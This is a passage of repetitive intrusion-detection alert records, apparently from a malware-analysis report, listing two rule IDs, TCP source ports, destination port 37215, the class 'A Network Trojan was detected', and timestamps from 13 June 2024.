              SID:2835222
              Source Port:40092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359338
              SID:2835222
              Source Port:43502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552406
              SID:2835222
              Source Port:55598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568215
              SID:2835222
              Source Port:48572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303401
              SID:2835222
              Source Port:58010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243477
              SID:2829579
              Source Port:33358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175359
              SID:2835222
              Source Port:48838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407444
              SID:2835222
              Source Port:52216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611495
              SID:2835222
              Source Port:39560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545119
              SID:2829579
              Source Port:35910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791647
              SID:2835222
              Source Port:56770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091937
              SID:2829579
              Source Port:35354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831677
              SID:2835222
              Source Port:47282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357748
              SID:2835222
              Source Port:44050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886075
              SID:2835222
              Source Port:36942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997026
              SID:2829579
              Source Port:48728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781805
              SID:2829579
              Source Port:45018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403138
              SID:2835222
              Source Port:57414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488405
              SID:2835222
              Source Port:54580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702567
              SID:2829579
              Source Port:53846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834084
              SID:2829579
              Source Port:60214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247148
              SID:2835222
              Source Port:37542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679292
              SID:2829579
              Source Port:46024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262846
              SID:2835222
              Source Port:55364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.949874
              SID:2835222
              Source Port:47914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833840
              SID:2829579
              Source Port:60386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452161
              SID:2835222
              Source Port:47538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630237
              SID:2829579
              Source Port:34144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708427
              SID:2835222
              Source Port:57738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885983
              SID:2829579
              Source Port:33612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086916
              SID:2835222
              Source Port:46064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212891
              SID:2829579
              Source Port:42352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339019
              SID:2835222
              Source Port:57536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320941
              SID:2829579
              Source Port:58086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214176
              SID:2829579
              Source Port:35380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612794
              SID:2829579
              Source Port:49022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153497
              SID:2835222
              Source Port:49710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708052
              SID:2835222
              Source Port:45978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525949
              SID:2835222
              Source Port:43618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129889
              SID:2829579
              Source Port:54090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438194
              SID:2829579
              Source Port:58622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088362
              SID:2829579
              Source Port:34220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675208
              SID:2835222
              Source Port:59768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568355
              SID:2829579
              Source Port:58018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632645
              SID:2835222
              Source Port:38652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670205
              SID:2835222
              Source Port:45898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568640
              SID:2835222
              Source Port:55840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870971
              SID:2829579
              Source Port:41068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844076
              SID:2835222
              Source Port:33092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889712
              SID:2835222
              Source Port:33224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150649
              SID:2835222
              Source Port:40768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100128
              SID:2835222
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358696
              SID:2829579
              Source Port:34094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993736
              SID:2829579
              Source Port:47146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674545
              SID:2835222
              Source Port:43908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379560
              SID:2829579
              Source Port:52494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169708
              SID:2835222
              Source Port:44580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059964
              SID:2835222
              Source Port:54518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154518
              SID:2829579
              Source Port:43976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990431
              SID:2829579
              Source Port:42856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613572
              SID:2829579
              Source Port:33720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821963
              SID:2835222
              Source Port:48718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247827
              SID:2835222
              Source Port:46992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212945
              SID:2829579
              Source Port:56278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271708
              SID:2829579
              Source Port:37216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307782
              SID:2829579
              Source Port:50372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707331
              SID:2829579
              Source Port:53132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475195
              SID:2829579
              Source Port:40608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.603749
              SID:2829579
              Source Port:50260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424003
              SID:2835222
              Source Port:59740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564455
              SID:2835222
              Source Port:54218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321213
              SID:2829579
              Source Port:39310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420592
              SID:2829579
              Source Port:36414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043184
              SID:2829579
              Source Port:34116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406541
              SID:2835222
              Source Port:48714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055983
              SID:2835222
              Source Port:33614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908172
              SID:2835222
              Source Port:50886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016178
              SID:2829579
              Source Port:44162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612356
              SID:2835222
              Source Port:51100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417987
              SID:2835222
              Source Port:47858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306007
              SID:2835222
              Source Port:41942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418018
              SID:2829579
              Source Port:43814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786622
              SID:2829579
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339777
              SID:2829579
              Source Port:41556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401827
              SID:2829579
              Source Port:48462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097254
              SID:2835222
              Source Port:50636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358306
              SID:2829579
              Source Port:33886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544981
              SID:2829579
              Source Port:52796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474990
              SID:2835222
              Source Port:37644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239008
              SID:2829579
              Source Port:46664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376655
              SID:2829579
              Source Port:60186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306960
              SID:2835222
              Source Port:52096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991541
              SID:2835222
              Source Port:37728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502060
              SID:2835222
              Source Port:60952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130285
              SID:2829579
              Source Port:33532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973300
              SID:2835222
              Source Port:46844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455690
              SID:2829579
              Source Port:35672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400751
              SID:2835222
              Source Port:41984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355006
              SID:2835222
              Source Port:39948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223387
              SID:2835222
              Source Port:36544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243859
              SID:2835222
              Source Port:45276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278439
              SID:2829579
              Source Port:34586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259115
              SID:2829579
              Source Port:52892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546795
              SID:2835222
              Source Port:51384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169110
              SID:2835222
              Source Port:35736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453377
              SID:2829579
              Source Port:57710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174908
              SID:2835222
              Source Port:58130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631109
              SID:2829579
              Source Port:44914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726111
              SID:2835222
              Source Port:32982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477088
              SID:2829579
              Source Port:34522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909644
              SID:2835222
              Source Port:50866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756839
              SID:2835222
              Source Port:59944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090814
              SID:2835222
              Source Port:49682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629808
              SID:2835222
              Source Port:42432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888854
              SID:2829579
              Source Port:60234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750800
              SID:2835222
              Source Port:54468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170254
              SID:2829579
              Source Port:47996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655786
              SID:2829579
              Source Port:49398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439336
              SID:2829579
              Source Port:49316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569230
              SID:2835222
              Source Port:51302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240734
              SID:2835222
              Source Port:46772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125786
              SID:2835222
              Source Port:50964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042279
              SID:2835222
              Source Port:58496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242927
              SID:2829579
              Source Port:44996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248651
              SID:2835222
              Source Port:58524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278401
              SID:2835222
              Source Port:40000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079333
              SID:2835222
              Source Port:49524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079032
              SID:2835222
              Source Port:55528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197474
              SID:2835222
              Source Port:33988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544659
              SID:2829579
              Source Port:53546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840920
              SID:2829579
              Source Port:41134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136448
              SID:2835222
              Source Port:57098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028153
              SID:2835222
              Source Port:36032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888792
              SID:2835222
              Source Port:60352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545930
              SID:2835222
              Source Port:45966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785659
              SID:2829579
              Source Port:44074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729537
              SID:2835222
              Source Port:56328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256231
              SID:2829579
              Source Port:52588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152371
              SID:2829579
              Source Port:44266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638689
              SID:2835222
              Source Port:35152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134406
              SID:2835222
              Source Port:33480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990572
              SID:2835222
              Source Port:45402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403166
              SID:2835222
              Source Port:39454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913519
              SID:2835222
              Source Port:34828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417839
              SID:2835222
              Source Port:35784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805017
              SID:2835222
              Source Port:44430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168478
              SID:2835222
              Source Port:35436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610755
              SID:2835222
              Source Port:52960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755837
              SID:2829579
              Source Port:49520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192769
              SID:2829579
              Source Port:54500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107689
              SID:2829579
              Source Port:47020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026363
              SID:2829579
              Source Port:53608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167053
              SID:2835222
              Source Port:39572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912576
              SID:2829579
              Source Port:59048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.341153
              SID:2835222
              Source Port:34814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257515
              SID:2835222
              Source Port:51552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420167
              SID:2829579
              Source Port:51984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092009
              SID:2835222
              Source Port:48932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886210
              SID:2835222
              Source Port:39836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299353
              SID:2829579
              Source Port:55966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403743
              SID:2835222
              Source Port:42624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824867
              SID:2835222
              Source Port:40180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418571
              SID:2829579
              Source Port:37018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509285
              SID:2835222
              Source Port:60200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913553
              SID:2835222
              Source Port:59598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275209
              SID:2835222
              Source Port:34630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977517
              SID:2835222
              Source Port:46152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544831
              SID:2835222
              Source Port:51898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840166
              SID:2835222
              Source Port:47358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301401
              SID:2829579
              Source Port:53130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227741
              SID:2835222
              Source Port:38200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487221
              SID:2829579
              Source Port:47456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222481
              SID:2835222
              Source Port:47170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303553
              SID:2835222
              Source Port:54120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173222
              SID:2835222
              Source Port:57838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996608
              SID:2829579
              Source Port:41976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154370
              SID:2835222
              Source Port:51576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725613
              SID:2829579
              Source Port:53146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417880
              SID:2829579
              Source Port:39518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221764
              SID:2835222
              Source Port:40218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988290
              SID:2835222
              Source Port:47308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155239
              SID:2829579
              Source Port:59932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377580
              SID:2829579
              Source Port:47628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011500
              SID:2835222
              Source Port:39694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547389
              SID:2829579
              Source Port:35062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297522
              SID:2829579
              Source Port:48678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354202
              SID:2829579
              Source Port:47866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048588
              SID:2829579
              Source Port:51302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273017
              SID:2835222
              Source Port:35180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420249
              SID:2829579
              Source Port:54348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422110
              SID:2829579
              Source Port:40236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.779948
              SID:2829579
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610400
              SID:2835222
              Source Port:58748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837060
              SID:2829579
              Source Port:54076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093149
              SID:2835222
              Source Port:37618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039415
              SID:2829579
              Source Port:39542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157894
              SID:2829579
              Source Port:46084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729967
              SID:2829579
              Source Port:40024
              Destination Port:37215
